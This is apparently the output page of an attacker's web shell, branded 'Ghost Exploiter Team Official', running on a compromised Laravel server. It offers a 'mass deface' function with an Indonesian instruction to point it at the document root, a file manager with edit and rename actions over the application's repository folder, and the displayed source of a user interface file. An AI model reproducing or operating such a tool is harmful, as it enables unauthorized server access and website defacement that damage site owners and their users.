Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Repositories
/
User
/
Interfaces
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AuthService.php
0.683KB
edt
ren
MessageResponse.php
1.271KB
edt
ren
Payment.php
7.176KB
edt
ren
ResponseDto.php
0KB
edt
ren
UserInterface-202601281
...
0.454KB
edt
ren
UserInterface-202601281
...
0.454KB
edt
ren
UserInterface.php
0.454KB
edt
ren
UserRepository.php
5.462KB
edt
ren
accounts.php
0.905KB
edt
ren
debugbar.php
13.946KB
edt
ren
<?php namespace App\Repositories\User\Interfaces; use Illuminate\Http\Request; interface UserInterface { public function index($type,Request $request); public function store(array $data, $image); public function blocked(int $userId, bool $type); public function show(int $userId); public function update(array $data, int $userId); public function destroy(int $userId); public function showPermissions($userId, int $modelId); }